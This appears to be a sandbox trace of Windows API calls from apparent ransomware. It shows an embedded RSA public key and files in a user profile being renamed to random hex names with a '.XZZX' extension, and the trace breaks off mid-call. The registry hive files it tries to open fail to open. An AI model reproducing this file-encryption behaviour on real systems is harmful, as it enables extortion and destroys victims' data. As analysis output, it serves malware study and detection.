Thread: id = 860 os_tid = 0x1050 [0226.520] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0226.520] lstrcpyW (in: lpString1=0x2daf460, lpString2="97978E0428D9BCBB43314AFC2CD2A103.XZZX" | out: lpString1="97978E0428D9BCBB43314AFC2CD2A103.XZZX") returned="97978E0428D9BCBB43314AFC2CD2A103.XZZX" [0226.520] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0226.521] SetErrorMode (uMode=0x1) returned 0x1 [0226.521] lstrcpyW (in: lpString1=0x2daf860, lpString2="97978E0428D9BCBB43314AFC2CD2A103.XZZX" | out: lpString1="97978E0428D9BCBB43314AFC2CD2A103.XZZX") returned="97978E0428D9BCBB43314AFC2CD2A103.XZZX" [0226.521] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0x8496e8e3, Data2=0x73a6, Data3=0x4d38, Data4=([0]=0x97, [1]=0x21, [2]=0xe9, [3]=0x5a, [4]=0x9d, [5]=0x6b, [6]=0x6b, [7]=0xf0))) returned 0x0 [0226.521] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\97978E0428D9BCBB43314AFC2CD2A103.XZZX") returned 71 [0226.521] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0226.521] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\C478FC3222E23A508496E8E325BD1E98.XZZX") returned 71 [0226.521] StrStrW (lpFirst="97978E0428D9BCBB43314AFC2CD2A103.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 861 os_tid = 0x1054 [0226.699] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0226.699] lstrcpyW (in: lpString1=0x2daf460, lpString2="DAE2CC280AF9F39884D63ACC0F1AD7E0.XZZX" | out: lpString1="DAE2CC280AF9F39884D63ACC0F1AD7E0.XZZX") returned="DAE2CC280AF9F39884D63ACC0F1AD7E0.XZZX" [0226.699] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0226.699] SetErrorMode (uMode=0x1) returned 0x1 [0226.699] lstrcpyW (in: lpString1=0x2daf860, lpString2="DAE2CC280AF9F39884D63ACC0F1AD7E0.XZZX" | out: lpString1="DAE2CC280AF9F39884D63ACC0F1AD7E0.XZZX") returned="DAE2CC280AF9F39884D63ACC0F1AD7E0.XZZX" [0226.699] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0xa6f2e73e, Data2=0x48b6, Data3=0x4003, Data4=([0]=0xb4, [1]=0x46, [2]=0x51, [3]=0xbc, [4]=0x24, [5]=0xd3, [6]=0xc, [7]=0x52))) returned 0x0 [0226.699] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\DAE2CC280AF9F39884D63ACC0F1AD7E0.XZZX") returned 71 [0226.699] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0226.699] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\01B9D614122E5A22A6F2E73E15093E6A.XZZX") returned 71 [0226.699] StrStrW (lpFirst="DAE2CC280AF9F39884D63ACC0F1AD7E0.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 862 os_tid = 0x107c [0226.846] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0226.846] lstrcpyW (in: lpString1=0x2daf460, lpString2="NTUSER.DAT" | out: lpString1="NTUSER.DAT") returned="NTUSER.DAT" [0226.846] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0226.846] SetErrorMode (uMode=0x1) returned 0x1 [0226.846] lstrcpyW (in: lpString1=0x2daf860, lpString2="NTUSER.DAT" | out: lpString1="NTUSER.DAT") returned="NTUSER.DAT" [0226.846] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0x395554f, Data2=0x9000, Data3=0x42f6, Data4=([0]=0x95, [1]=0xaf, [2]=0x85, [3]=0x31, [4]=0x2d, [5]=0xb8, [6]=0x96, [7]=0xfd))) returned 0x0 [0226.846] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT") returned 44 [0226.846] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0226.846] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\FFFC700025AA60000395554F28854448.XZZX") returned 71 [0226.846] StrStrW (lpFirst="NTUSER.DAT", lpSrch="XZZX") returned 0x0 [0226.846] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT", dwFileAttributes=0x20) returned 1 [0226.847] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 863 os_tid = 0x1080 [0227.002] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0227.002] lstrcpyW (in: lpString1=0x2daf460, lpString2="ntuser.dat.LOG1" | out: lpString1="ntuser.dat.LOG1") returned="ntuser.dat.LOG1" [0227.002] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0227.002] SetErrorMode (uMode=0x1) returned 0x1 [0227.003] lstrcpyW (in: lpString1=0x2daf860, lpString2="ntuser.dat.LOG1" | out: lpString1="ntuser.dat.LOG1") returned="ntuser.dat.LOG1" [0227.003] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0x1663dab3, Data2=0xf825, Data3=0x41c8, Data4=([0]=0xaf, [1]=0x77, [2]=0x63, [3]=0xb0, [4]=0x3d, [5]=0x3a, [6]=0x78, [7]=0x5f))) returned 0x0 [0227.003] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1") returned 49 [0227.003] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0227.003] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\F84C03DF3FC341E81663DAB3429E2630.XZZX") returned 71 [0227.003] StrStrW (lpFirst="ntuser.dat.LOG1", lpSrch="XZZX") returned 0x0 [0227.003] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1", dwFileAttributes=0x20) returned 1 [0227.003] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat.log1"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 864 os_tid = 0x1084 [0227.158] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0227.158] lstrcpyW (in: lpString1=0x2daf460, lpString2="ntuser.dat.LOG2" | out: lpString1="ntuser.dat.LOG2") returned="ntuser.dat.LOG2" [0227.158] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0227.158] SetErrorMode (uMode=0x1) returned 0x1 [0227.158] lstrcpyW (in: lpString1=0x2daf860, lpString2="ntuser.dat.LOG2" | out: lpString1="ntuser.dat.LOG2") returned="ntuser.dat.LOG2" [0227.158] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0x97951b16, Data2=0xca25, Data3=0x415d, Data4=([0]=0xae, [1]=0x3b, [2]=0x50, [3]=0x47, [4]=0x70, [5]=0x86, [6]=0x64, [7]=0xed))) returned 0x0 [0227.158] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2") returned 49 [0227.158] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0227.158] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\8FEC462E339CD47197951B163677B8B9.XZZX") returned 71 [0227.158] StrStrW (lpFirst="ntuser.dat.LOG2", lpSrch="XZZX") returned 0x0 [0227.158] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2", dwFileAttributes=0x20) returned 1 [0227.159] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat.log2"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 865 os_tid = 0x1088 [0227.314] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0227.314] lstrcpyW (in: lpString1=0x2daf460, lpString2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" | out: lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" [0227.314] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0227.314] SetErrorMode (uMode=0x1) returned 0x1 [0227.314] lstrcpyW (in: lpString1=0x2daf860, lpString2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" | out: lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" [0227.314] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0xfbdcc51a, Data2=0x6bb4, Data3=0x4014, Data4=([0]=0xb8, [1]=0xac, [2]=0xc1, [3]=0x3a, [4]=0xe7, [5]=0x3d, [6]=0x43, [7]=0xa1))) returned 0x0 [0227.314] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 89 [0227.314] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0227.314] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\5D9C74481AF56A10FBDCC51A1DD04E58.XZZX") returned 71 [0227.314] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch="XZZX") returned 0x0 [0227.314] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", dwFileAttributes=0x20) returned 1 [0227.314] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 866 os_tid = 0x108c [0227.470] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0227.470] lstrcpyW (in: lpString1=0x2daf460, lpString2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" | out: lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" [0227.470] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0227.470] SetErrorMode (uMode=0x1) returned 0x1 [0227.470] lstrcpyW (in: lpString1=0x2daf860, lpString2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" | out: lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" [0227.470] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0xa913cd96, Data2=0xa426, Data3=0x4fce, Data4=([0]=0x95, [1]=0xb0, [2]=0xf4, [3]=0x69, [4]=0xf6, [5]=0xc2, [6]=0x6c, [7]=0xbb))) returned 0x0 [0227.470] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 126 [0227.470] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0227.470] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\C8A49C44332BD094A913CD963606B4DC.XZZX") returned 71 [0227.470] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch="XZZX") returned 0x0 [0227.470] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", dwFileAttributes=0x20) returned 1 [0227.471] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 867 os_tid = 0x1090 [0227.626] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0227.626] lstrcpyW (in: lpString1=0x2daf460, 